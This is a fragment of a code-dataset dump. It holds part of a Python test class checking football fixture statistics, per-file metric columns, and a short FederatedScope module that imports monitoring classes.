def test_get_penalty_saves_finished(self, fixture):
self._do_test_finished(fixture, "get_penalty_saves")
def test_get_penalty_misses_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_penalty_misses")
def test_get_penalty_misses_finished(self, fixture):
self._do_test_finished(fixture, "get_penalty_misses")
def test_get_saves_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_saves")
def test_get_saves_finished(self, fixture):
self._do_test_finished(fixture, "get_saves")
def test_get_bonus_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_bonus")
def test_get_bonus_finished(self, fixture):
self._do_test_finished(fixture, "get_bonus")
def test_get_bps_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_bps")
def test_get_bps_finished(self, fixture):
self._do_test_finished(fixture, "get_bps")
@staticmethod
def test_str(fixture):
assert str(fixture) == "Southampton vs. Bournemouth - 2019-09-20T19:00:00Z"
| 25.2208
| 91
| 0.308127
| 1,047
| 15,763
| 4.402101
| 0.123209
| 0.032545
| 0.070514
| 0.073769
| 0.863094
| 0.832936
| 0.830332
| 0.799957
| 0.756129
| 0.705793
| 0
| 0.062312
| 0.578507
| 15,763
| 624
| 92
| 25.261218
| 0.631397
| 0
| 0
| 0.484483
| 0
| 0
| 0.136966
| 0.002791
| 0
| 0
| 0
| 0
| 0.024138
| 1
| 0.041379
| false
| 0
| 0.001724
| 0
| 0.044828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f945b5b0eee2b3a8499fba8c4f032a95404a792
| 260
|
py
|
Python
|
federatedscope/core/monitors/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | 9
|
2022-03-24T07:59:37.000Z
|
2022-03-31T06:47:52.000Z
|
federatedscope/core/monitors/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | 1
|
2022-03-28T13:52:17.000Z
|
2022-03-28T13:52:17.000Z
|
federatedscope/core/monitors/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | null | null | null |
from federatedscope.core.monitors.early_stopper import EarlyStopper
from federatedscope.core.monitors.metric_calculator import MetricCalculator
from federatedscope.core.monitors.monitor import Monitor
__all__ = ['EarlyStopper', 'MetricCalculator', 'Monitor']
| 43.333333
| 75
| 0.853846
| 27
| 260
| 8
| 0.481481
| 0.25
| 0.305556
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069231
| 260
| 5
| 76
| 52
| 0.892562
| 0
| 0
| 0
| 0
| 0
| 0.134615
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.